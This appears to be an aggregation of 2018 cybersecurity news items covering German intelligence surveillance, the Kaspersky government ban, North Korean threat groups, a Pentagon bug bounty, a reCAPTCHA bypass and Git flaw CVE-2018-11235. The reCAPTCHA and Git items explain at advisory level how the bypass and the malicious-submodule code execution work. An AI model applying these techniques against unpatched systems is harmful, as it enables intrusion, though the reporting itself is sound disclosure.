The hub is operated by the De-Cix Management GmbH, which is owned by the European internet industry organization eco Association.

The European eco Associationh body filed suit against Germany’s interior ministry against its surveillance activities.

“We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner.” states the body.

The mutual support of the US NSA intelligence agency and the BND was largely documented in the past.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. At the time, the cyberspies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.

In August 2015, the German weekly Die Zeit disclosed documents that reveal how the German Intelligence did a deal with the NSA to get the access to the surveillance platform XKeyscore.

Internal documents reported that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return of data from Germany.

Back in 2o11, the NSA demonstrated the capabilities of the XKeyscore platform of the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA spyware software and install it for analyzing metadata collected on German citizens. In return, the German Agency promised to share metadata collected.

The NSA tool collects ‘nearly everything a user does on the internet’, XKeyscore gives ‘widest-reaching’ collection of online data analyzing the content of emails, social media, and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and it also enables the intelligence analysts to track the user’s activities on Facebook through a system dubbed XKeyscore.

XKeyscore map used also by BND

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.

In June 2016, the German government approved new measures to rein in the activities of BND agency after its scandalous support to NSA surveillance activity.


US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
1.6.2018 securityaffairs BigBrothers

A US Federal court judge, Colleen Kollar-Kotelly, rejected a lawsuit by Russian cybersecurity firm Kaspersky Lab against the ban on the use it solution by government agencies
On Wednesday, the US Federal court judge Colleen Kollar-Kotelly rejected a lawsuit by Russian cyber security firm Kaspersky Lab against the ban on the use it solution by government agencies.

The ban on security firm Kaspersky imposed by the US Department of Homeland security started in September 2017.

In December, Kaspersky Lab sued the U.S. Government over product ban, it’s appeal was filed in the U.S. District Court for the District of Columbia, just a week after the US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

Section 1634 of the bill prohibits the use of security software and services provided by security giant, the ban will start from October 1, 2018.

Below the details of the ban included in the section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

US officials believe Russian intelligence could use the Kaspersky software to spy on the systems running it.

Back to the present, Federal court judge Colleen Kollar-Kotelly rejected the lawsuit, reaffirming the right of the government to choose its providers to protect the security of its infrastructure.

The ban “does not inflict ‘punishment’ on Kaspersky Lab,” Kollar-Kotelly said in her ruling.

“It eliminates a perceived risk to the nation’s cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation,” said Kollar-Kotelly.

kaspersky

The judge rejected Kaspersky’s complaint that US Government had illegally denied the firm’s “right” to sell a product, she also remarked that the ban is legal and will remain in place.

The impact on Kaspersky was severe, other governments expressed their concerns over the possibility to hack their solutions as part of cyber espionage campaigns.

Many companies in the US already stopped using Kaspersky software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.


North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
1.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked as Andariel Group, leveraged an ActiveX zero-day vulnerability in targeted attacks against South Korean entities.
According to a report published by South Korean cyber-security firm AhnLab, the Andariel Group is a division of the dreaded Lazarus APT Group, it already exploited ActiveX vulnerabilities in past attacks

The attackers exploited at least nine separate ActiveX vulnerabilities, including a new zero-day flaw, in a wave of watering hole attacks aimed to infect visitors of compromised websites with a backdoor trojan.

The zero-day vulnerability seems to be connected to a series of attacks against Samsung SDS Acube installations.

Acube is an application developed by Samsung’s enterprise division widely used in South Korean enterprises that supports ActiveX controls to implement interactive features.

“According to the security industry, from late last month until this month, attacks against North Korean research institutes and websites have been spotlighted.” reported the local media DDaily.

“The attacker, who is believed to be carrying the Andaleri Group, exploited about 9 ActiveX vulnerabilities, including Samsung SDS “eCube”, and tried to collect information through a water ring attack.”


The malicious code was used to control the infected systems and gather intelligence.

“The zero-day vulnerability has been found in this attack, but it is unclear whether the attacker actually used it,” said a government official from the Korea Internet & Security Agency (KISA).

Simon Choi
@issuemakerslab
Operation GoldenAxe. North Korea's cyber attack only on South Korea (using ActiveX vuln) from 2007 to 2018.

10:28 AM - May 29, 2018
36
30 people are talking about this
Twitter Ads info and privacy
Samsung addressed the Acube zero-day flaw with the release of an update, while South Korea’s CERT team has issued a security advisory for the zero-day issue.

North Korea-linked APT groups are among the most active threat actors, recently the US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra, the Brambul and Joanap.


Senators Ask National Security Advisor to Save Cybersecurity Coordinator Role
31.5.2018 securityweek BigBrothers

A group of Democrat senators is urging National Security Advisor John Bolton to reconsider the decision to eliminate the role of cybersecurity coordinator, arguing that it represents a step in the wrong direction.

Bolton announced the decision to cut the cybersecurity role following the departure of Rob Joyce. The National Security Council (NSC) said the move was part of an effort to streamline authority, noting that the duties of the cybersecurity coordinator would be taken over by two other senior directors.

“Streamlining management will improve efficiency, reduce bureaucracy and increase accountability,” the NSC said at the time.

Cybersecurity experts and several lawmakers contested the decision after it was announced. On Wednesday, Senator Amy Klobuchar and 18 other senators sent a letter to Bolton urging him to reconsider his recommendation, citing increasingly frequent and sophisticated cyber operations, particularly ones believed to have been launched by Russia.

“Our country’s cybersecurity should be a top priority; therefore, it is critically important that the U.S. government present a unified front in defending against cyberattacks,” the senators wrote. “Eliminating the Cybersecurity Coordinator role keeps us from presenting that unified front and does nothing to deter our enemies from attacking us again. Instead, it would represent a step in the wrong direction.”

While there are a few private-sector cybersecurity professionals who applaud the decision, many believe eliminating the role is a big mistake.

“The removal of the cybersecurity position will leave the Trump administration flat footed the next time a major cyber event does happen. In situations where minutes matter, the most prepared person in the room almost always carries the day. In a room full of decision makers with no cyber security background and a general who is in charge of fighting cyber wars, it is a foregone conclusion as to whom will have the strongest voice in the room,” Ross Rustici, senior director of intelligence services at Cybereason, told SecurityWeek.

“Every cyber event will become a military issue with a military solution. Regardless of the efficacy of the position or those who occupied it, the fact that the position existed demonstrated a commitment to understanding, managing, and responding to cyber threats in a way that was on par with the other major global issues of the day. The absorption of that position into someone else’s duties makes cyber outside of the military context an ‘other duties as assigned’ mission. This will lead to a marginalization of the knowledge and strategy,” Rustici added.


HTTP Parameter Pollution Leads to reCAPTCHA Bypass
31.5.2018 securityweek Security

Earlier this year, a security researcher discovered that it was possible to bypass Google’s reCAPTCHA via HTTP parameter pollution.

The issue, application and cloud security expert Andres Riancho says, can be exploited when a web application crafts the request to /recaptcha/api/siteverify in an insecure way. Exploitation allows an attacker to bypass the protection every time.

When a web application using reCAPTCHA challenges the user, “Google provides an image set and uses JavaScript code to show them in the browser,” the researcher notes.

After solving the challenge, the user clicks verify, which triggers an HTTP request to the web application, which in turn verifies the user’s response with a request to Google’s reCAPTCHA API.

The application authenticates itself and sends a {reCAPTCHA-generated-hash} to the API to query the response. If the user solved the challenge correctly, the API sends an "OK" that the web application receives, processes, and most likely grants the user access to the requested resource.

Riancho discovered that an HTTP parameter pollution in the web application could be used to bypass reCAPTCHA (the requirement, however, reduced the severity of the vulnerability).

“HTTP parameter pollution is almost everywhere: client-side and server-side, and the associated risk depends greatly on the context. In some specific cases it could lead to huge data breach, but in most cases it is a low risk finding,” Riancho explains.

He notes that it was possible to send two HTTP requests to Google’s service and receive the same response. The reCAPTCHA API would always use the first secret parameter on the request but ignore the second, an issue the researcher was able to exploit.

Additionally, Google is providing web developers interested in testing their web applications with a hard-coded site and secret key to disable reCAPTCHA verification in staging environments and perform their testing, and the bypass leverages this functionality as well.

“If the application was vulnerable to HTTP parameter pollution AND the URL was constructed by appending the response parameter before the secret then an attacker was able to bypass the reCAPTCHA verification,” the researcher notes.

Two requirements should be met for the vulnerability to be exploitable: the web application needs to have an HTTP parameter pollution flaw in the reCAPTCHA URL creation, and to create the URL with the response parameter first, and then the secret. Overall, only around 3% of reCAPTCHA implementations would be vulnerable.

Riancho points out that Google addressed the issue in the REST API by returning an error when the HTTP request to /recaptcha/api/siteverify contains two parameters with the same name.

“Fixing it this way they are protecting the applications which are vulnerable to the HTTP Parameter Pollution and the reCAPTCHA bypass, without requiring them to apply any patches,” the researcher notes.

The issue was reported to Google on January 29, and a patch was released on March 25. The search giant paid the researcher $500 for the discovery.


U.S. Judge Rejects Kaspersky Suit Against Govt Ban on its Products
31.5.2018 securityweek BigBrothers

Washington - A Washington judge on Wednesday rejected a lawsuit by Russian computer security company Kaspersky Lab against the ban on use of its anti-virus software by government agencies.

Kaspersky had complained that the ban -- announced after officials said Russian intelligence was able to hack the software for espionage purposes -- was in effect a "punishment" of the company without it having given it any kind of hearing.

Federal court judge Colleen Kollar-Kotelly rejected the argument, saying the US government had the right to institute the ban to defend its computer security.

Related: The Increasing Effect of Geopolitics on Cybersecurity

The ban "does not inflict 'punishment' on Kaspersky Lab," Kollar-Kotelly said in her ruling.

"It eliminates a perceived risk to the nation's cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation," she said.

She also rejected the global cybersecurity giant's complaint that it had been illegally denied the "right" to sell a product that is legal, and that the ban harmed its reputation.

While the company can still market its products, she said, the government has no obligation to buy them.

In addition, she said, as the ban is legal and will remain in place, nothing can be done about any harm to its reputation.

The ban began with a directive in September 2017 from the Department of Homeland Security for government agencies to remove Kaspersky software from their computing systems.

That has since been followed by a provision set by Congress in a budget bill prohibiting agencies from using Kaspersky software.

Both came after the National Security Agency, the US signals intelligence body, determined that Kaspersky software on an NSA employee's private computer allowed hackers, believed to be from Russian intelligence, to steal top secret NSA materials.

US officials have also expressed concern about alleged ties between Kaspersky and the Russian government, which the company denies.

The impact on the company has been heavy. Most US companies have moved to stop using its software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.


Operator of World's Top Internet Hub Sues German Spy Agency
31.5.2018 securityweek BigBrothers

Berlin - The operator of the world's largest internet hub challenged the legality of sweeping telecoms surveillance by Germany's spy agency, a German court heard Wednesday.

The BND foreign intelligence service has long tapped international data flows through the De-Cix exchange based in the German city of Frankfurt.

But the operator argues the agency is breaking the law by also capturing German domestic communications.

"We have grave doubts about the legality of the current practice," said a statement Wednesday on the website of De-Cix Management GmbH, which is owned by European internet industry body the eco association.

"We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner."

Its lawyer Sven-Erik Heun told German news agency DPA that "the BND has chosen the biggest pond to go fishing in".

De-Cix Management launched its suit against the German interior ministry, which oversees the BND and its strategic signals intelligence.

"With the lawsuit, we seek judicial clarification and, in particular, legal certainty for our customers and our company," the company said.

The federal administrative court in the eastern city of Leipzig was not certain to make a ruling on Wednesday.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

The De-Cix operator says its Frankfurt hub is the world's biggest Internet Exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, and handles more than 6 terabits per second at peak traffic.

The De-Cix, with 20 data centres, uses more electricity than Frankfurt international airport, the Sueddeutsche Zeitung daily reported this week.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.


Tens of Vulnerabilities Found in Pentagon Travel Management System
31.5.2018 securityweek 
Vulnerebility

HackerOne announced on Wednesday the results of “Hack the DTS,” the fifth bug bounty program run by the U.S. Department of Defense (DOD).

The DTS (Defense Travel System) is a fully integrated and automated travel management system created specially for the DOD. The platform is said to be accessed by roughly 100,000 unique users every day, including for creating authorizations, receiving approvals, preparing reservations, and generating travel vouchers.

The Pentagon wanted to test the security of the platform and selected 19 vetted hackers from HackerOne to complete the task. Researchers, mainly from the United States and the United Kingdom, submitted more than 100 vulnerability reports, 65 of which were classified as unique and valid, including 28 that described critical and high severity flaws.

White hat hackers earned a total of $78,650 for their findings, with the highest single payout, $5,000, paid out eight times.

“DTS is relied on by DoD travelers. More than 9,500 sites operate worldwide, and the security of these systems is mission-critical,” said Jack Messer, project lead at Defense Manpower Data Center (DMDC). “The ‘Hack the DTS’ challenge helped uncover vulnerabilities we wouldn’t have found otherwise, complementing the great work DMDC is already doing to protect critical enterprise systems and the people those systems serve.”

HackerOne pointed out that Hack the DTS was the second government bug bounty program that allowed participants to use social engineering.

The Pentagon has awarded researchers hundreds of thousands of dollars for finding thousands of vulnerabilities in its systems. The money was paid out through the Hack the Pentagon, Hack the Air Force, Hack the Army, and Hack the Air Force 2.0 bug bounty programs.


North Korea-Linked Group Stops Targeting U.S.
31.5.2018 securityweek BigBrothers

A threat actor linked to North Korea’s Lazarus Group has stopped targeting organizations in the United States, but remains active in Europe and East Asia.

The group, tracked by industrial cybersecurity firm Dragos as Covellite, has been known to target civilian electric energy organizations in an effort to collect intellectual property and information on industrial operations.

Unlike some of the other actors whose activities have been monitored by Dragos, Covellite does not currently have the capability to disrupt industrial control systems (ICS). However, the security firm does see it as a primary threat to the ICS industry.

Covellite’s campaigns have been aimed at organizations in Europe, East Asia and North America. One of the operations, conducted in September 2017, targeted U.S. electric companies and involved phishing emails and malicious Word documents designed to deliver a piece of malware.

FireEye analyzed those attacks and linked them to an actor affiliated with the North Korean government. The security firm published a report in October 2017 and noted that the actor appeared to lack the ability to disrupt power supply.

A blog post published by Dragos on Thursday does not mention North Korea, but researchers pointed out that Covellite’s infrastructure and malware are similar to ones associated with the group known as Lazarus and Hidden Cobra.

“Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

According to Dragos, Covellite has been around since 2017 and is still active, but it has recently stopped targeting organizations in North America, while continuing to attack entities in Europe and East Asia.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,” said Caltagirone.

While Covellite may no longer be targeting organizations in the United States, that does not mean all North Korea-linked groups have done the same. Several cybersecurity firms told CyberScoop this week that North Korea has still launched attacks on businesses in the U.S.

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.


Fraud Protection Firm Signifyd Raises $100 Million
31.5.2018 securityweek  IT 

Signifyd, a San Jose, CA-based company that specializes in fraud protection solutions for e-commerce businesses, on Wednesday announced that it raised $100 million in a Series D funding round.

The round was led by Premji Invest, with participation from existing investors Bain Capital Ventures, Menlo Ventures, American Express Ventures, IA Ventures, Allegis Cyber and Resolute Ventures.

This brings the total raised by the company to date to $187 million, including $56 million secured in 2017 and $20 million in the previous year. Bloomberg reported that the company has been valued at roughly $400 million following the latest funding round.

Signifyd says it will use the funds to further accelerate its growth. The company claims the number of global e-commerce businesses it protects has doubled to more than 10,000. Signifyd customers include Build.com, Helly Hansen, iRobot, Walmart-owned Jet, Lacoste, Luxottica, Stance, Tous and Wayfair.

The company recently partnered with Magento, the open-source e-commerce platform, which Adobe agreed to buy for $1.68 billion.

Signifyd provides a solution that helps organizations identify fraudulent online orders by using a combination of machine learning, data science research and behavior technology. The solution should help reduce the risk of chargebacks and fraud without having a negative impact on customer experience.

Last month, the company opened its first European office in Barcelona, Spain.

“The fraud detection and prevention market is estimated to reach nearly $42 billion by 2022,” said Raj Ramanand, CEO and co-founder of Signifyd. “However, while fraud remains a serious concern, transactions wrongly declined due to suspected fraud represents a bigger problem of more than $150 billion a year. A wrong decline can push consumers to abandon the merchant and thereby erode customer lifetime value. With this funding, we’re looking to continue to enable friction-free e-commerce for enterprise and omnichannel retailers globally.”


The Current Limitations and Future Potential of AI in Cybersecurity
31.5.2018 securityweek  Cyber

A recent NIST study shows the current limitations and future potential of machine learning in cybersecurity.

Published Tuesday in the Proceedings of the National Academy of Sciences, the study focused on facial recognition and tested the accuracy of a group of 184 humans and the accuracy of four of the latest facial recognition algorithms. The humans comprised 87 trained professionals, 13 so-called 'super recognizers' (who simply have an exceptional natural ability), and a control group of 84 untrained individuals.

Reassuringly, the trained professionals performed significantly better than the untrained control groups. Surprisingly, however, neither human experts nor machine algorithms alone provided the most accurate results. The best performance came from combining a single expert with the best algorithm.

"Our data show that the best results come from a single facial examiner working with a single top-performing algorithm," commented NIST electronic engineer P. Jonathon Phillips. "While combining two human examiners does improve accuracy, it's not as good as combining one examiner and the best algorithm."

"The NIST study used a form of deep learning known as convolutional neural networks that has been proven effective for image recognition because it performs comparative analysis based on pixels rather than the entire image. This is like looking at the individual trees rather than the forest, to use a colloquialism," explains Chris Morales, head of security analytics at Vectra.

The question asked by the NIST researchers was how many humans or machines combined would lead to the lowest error rate of judgement when comparing two photos to determine if it they are of the same person -- with no errors being a perfect score. The outcome of their research was that combining man and machine produces a higher rate of accuracy for a single worker, which resulted in higher productivity. This result occurred because man and machine have different strengths and weaknesses that can be leveraged and mitigated by working together.

"What the researchers found," continued Morales, "was the best machine performed in the same range as the best humans. In addition, they found that combining a single facial examiner with machine learning yielded a perfect accuracy score of 1.0 (no errors). To achieve this same 1.0 accuracy level without machine learning required either four trained facial examiners or three super recognizers."

If these results are typical across the increasing use of artificial intelligence (AI) in cyber security -- and Morales believes the study is representative of the value of AI -- it implies we are rapidly approaching a tipping point. Right now, algorithms are not significantly better than trained professionals, but if used by a trained professional they can improve performance and reduce required manpower levels.

While AI itself is not new, it has grown dramatically in use and capability over just the last few years. "If we had done this study three years ago, the best computer algorithm's performance would have been comparable to an average untrained student," NIST's Phillips said. "Nowadays, state-of-the-art algorithms perform as well as a highly trained professional."

The implication is that we are not yet ready to rely solely on the decisions of machine learning algorithms, but that day is surely coming if algorithm quality continues to improve. We have, however, already reached the point where AI can decrease our reliance on human resources. The best results came not from team of experts combined with machine learning, but from a single professional working with the best algorithm.

"It is often the case that the optimum solution to a new problem is found with the combination of human and machine," comments Tim Sadler, CEO and co-founder of machine learning email security firm Tessian. "However, as more labelled data becomes available, and more researchers look into the problem, machine learning models generally become more accurate and autonomous reducing the need for a human 'operator'. A good example of this is medical imaging diagnosis where deep learning models now greatly outperform radiologists in the early diagnosis of cancerous tissues and will soon become the AI 'silver bullet'."

He doesn't believe that facial recognition algorithms have reached that stage yet.

"Facial recognition technology is fairly new, and although machine learning is quickly disrupting the industry clearly the technology is not perfect, for example there have been instances where facial recognition technology has authenticated through family likeness," Sadler said. "It will take years of close partnership between facial recognition experts are their machine learning counterparts working together, with the experts overriding the machine's mistakes and correctly labelling the data before a similar disruption is seen."

This NIST study is specifically about facial recognition -- but the basic principles are likely to be similar across all uses of machine learning in biometrics and cybersecurity. " First, the machine learning algorithm gathers facts about a situation through inputs and then compares this information to stored data and decides what the information signifies," explains Dr. Kevin Curran, senior IEEE member and professor of cybersecurity at Ulster University. "The computer runs through various possible actions and predicts which action will be most successful based on the collected information.

"AI is therefore increasingly playing a significant role in cybersecurity, especially as more challenges appear with authenticating users. However, these AI techniques must be adaptive and self-learning in complex and challenging scenarios where people have parts of their face obscured or the lighting is quite poor to preserve accuracy and a low false acceptance rate."

He cites the use of AI in Apple's Face ID. "Face ID works by projecting around 30,000 infrared dots on a face to produce a 3D mesh. This resultant facial recognition information is stored locally in a secure enclave on the new Apple A11 Bionic chip. The infra-red sensor on front is crucial for sensing depth. Earlier facial recognition features e.g. Samsung last year, were too easily fooled by face masks and 2D photos. Apple claim their Face ID will not succumb to these methods. However, some claim already that 3D printing someone's head may fool it, but we have yet to see that hack tested."

This NIST study was solely about the efficacy of facial recognition algorithms, and the results cannot be automatically applied to other machine learning algorithms. Nevertheless, the general conclusions are likely to apply across many other uses for AI in both physical security and cybersecurity. AI is improving rapidly. It cannot yet replace human expertise completely, but is most effective used in conjunction or by a single human expert. The implication is very clear: the correct combination of man and machine already has the potential to both improve performance and reduce payroll costs.


Miscreants hijacked the defunct SpamCannibal blacklist service
30.5.2018 securityaffairs
Spam  

The SpamCannibal blacklist service was hijacked since Wednesday morning, attackers changed the DNS name server settings for the website overnight.
The SpamCannibal was born to blacklist IP address of malicious servers involved in spam campaigns and DoS attacks.

SpamCannibal was using a continually updated database containing the IP addresses of spam or DoS servers and blocks their ability to connect using services on a computer system that purposely delays incoming connections (aka TCP/IP tarpit).

The blacklist service was offline since last summer, but someone hijacked it on Wednesday morning, attackers changed the DNS name server settings for the website overnight.

SpamCannibal

The news was first reported by El Reg that was informed of the strange resurrection by a reader who told them that SpamCannibal was “pumping out Blacklist notifications for some of our servers and then when you go to spamcannibal.org, you get spam.”

“Visiting the site earlier today flung fake Adobe Flash updates at our sandboxed browser, downloads no doubt riddled with malware, so beware.” reads a blog post published by El Reg.

The DNS record for the blacklist service was changed to point at a rogue server controlled by attackers that likely used it to deliver malware and to alter the results of queries to the blacklist service.

Kevin Beaumont 🐈

@GossiTheDog
If anybody uses spamcannibal's RBL, the domain has been taken over and has a wildcard response - so it returns everything as status spam. https://twitter.com/webme_it/status/1001731230264627202 …

12:51 PM - May 30, 2018
23
22 people are talking about this
Twitter Ads info and privacy
All the users that queried the service to check an IP address to see if it is blacklisted as a spam source received always a positive result with serious consequences.

The attackers set a wildcard domain so that any subdomain of spamcannibal.org returns an IP address, with this trick the domain was interpreted as blacklisted.
Researcher Martijn Grooten believes the attack wasn’t targeted.

“This really looks like a standard domain takeover by some dodgy parking service. Doesn’t appear particularly targeted to Spamcannibal,” Grooten concluded.


CVE-2018-11235 flaw in Git can lead to arbitrary code execution
30.5.2018 securityaffairs
Vulnerebility  

The Git community disclosed a dangerous vulnerability in Git, tracked as CVE-2018-11235, that can lead to arbitrary code execution when a user operates in a malicious repository.
The Git developer team and other firms offering Git repository hosting services have issued security updates to address a remote code execution vulnerability, tracked as CVE-2018-11235 in the Git source code versioning software.

“In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.” reads the description provided by the Mitre organization.

“With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs “git clone –recurse-submodules” because submodule “names” are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with “../” in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.”

The vulnerability was discovered by the researcher Etienne Stalmans as part of GitHub’s bug bounty program.

The Git 2.17.1 addressed the CVE-2018-11235 vulnerability along with the CVE-2018-11233 flaw.

The CVE-2018-11235 could be exploited by an attacker to set up a malformed Git repository containing a specially-built Git submodule. The attacker needs to trick victims into clone the rogue repository to execute arbitrary code on users’ systems.

The problem resides in the way the Git client handles the specially-built Git submodule.

The release also includes the support for Git server-side component that could be used by Git hosting services to detect code repositories containing malicious submodules and prevent their upload.

“In addition to the above fixes, this release adds support on the server side that reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers with older clients by preventing malicious contents from spreading.” reads the release note for the v2.17.

“This is enabled by the same receive.fsckObjects configuration on the server side as other security and sanity related checks (e.g. rejecting tree entry “.GIT” in a wrong case as tracked contents, targetting victims on case insensitive systems) that have already been implemented in the past releases. It is recommended to double check your configuration if you are hosting contents for other people.”

Major Git hosting services like GitHub and Microsoft have already installed the security patches.

Edward Thomson, Program Manager for Visual Studio Team Services, confirmed that Git 2.17.1 and Git for Windows 2.17.1 (2) already include the fix for the flaws and encourages all users to update their Git clients as soon as possible.

Thomson published a technical analysis for the CVE-2018-11235 vunerability.